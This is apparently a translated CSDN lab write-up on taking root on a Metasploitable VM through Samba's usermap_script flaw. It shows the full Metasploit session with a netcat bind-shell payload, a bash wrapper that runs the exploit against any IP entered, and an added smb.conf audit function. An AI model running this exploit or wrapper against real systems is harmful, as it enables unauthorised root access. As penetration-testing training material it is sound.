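Experiment 1: Taking control of a Linux target by attacking a Samba service vulnerability
Target IP: 192.168.232.134
Metasploitable target VM download: link: http://pan.百度.com/s/1slHJcZV password: ndoj
Lab environment: Kali Linux
kali: msfconsole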
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
Payload options (cmd/unix/bind_netcat)
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ok
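The usermap_script module used above targets Samba servers whose smb.conf sets the non-default "username map script" option, so removing that option closes this path. The shell function below is an added example, not part of the original post, that audits an smb.conf for the option; the function name, sample configuration and script path are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag smb.conf files that enable "username map script".

# Print "section<TAB>value" for every active "username map script" setting
# in the file given as $1 ("-" reads stdin).
# Exit status: 0 = at least one setting found, 1 = none found.
find_usermap_script() {
    awk '
        /^[ \t]*[#;]/ { next }                  # skip comment lines
        /^[ \t]*\[/ {                           # section header, e.g. [global]
            section = $0
            gsub(/^[ \t]*\[|\][ \t]*$/, "", section)
            next
        }
        {
            eq = index($0, "=")
            if (eq == 0) next
            name = tolower(substr($0, 1, eq - 1))
            gsub(/[ \t]/, "", name)             # smb.conf ignores case and spaces in names
            value = substr($0, eq + 1)
            gsub(/^[ \t]+|[ \t\r]+$/, "", value)
            if (name == "usernamemapscript" && value != "") {
                printf "%s\t%s\n", section, value
                found = 1
            }
        }
        END { exit(found ? 0 : 1) }
    ' "$1"
}

# Constructed sample configuration (not taken from the target in this lab).
find_usermap_script - <<'EOF'
[global]
   workgroup = WORKGROUP
   ; username map = /etc/samba/smbusers
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
EOF
```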
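Experiment 2:
Write a shell script around the msfcli command so that the user only has to enter an IP address to use the usermap_script exploit module.
msfcli has been replaced; using msfconsole -x is recommended instead.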
kali: vim metasploit.shell
#!/bin/bash
# Prompt for the target IP, then run the module through msfconsole -x
echo "请输入目标ip"
read -r ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit"
kali: chmod a+x metasploit.shell
kali: ./metasploit.shell
Source: CSDN
Author: sky_seeker
Link: https://blog.csdn.net/m0_37641759/article/details/72859083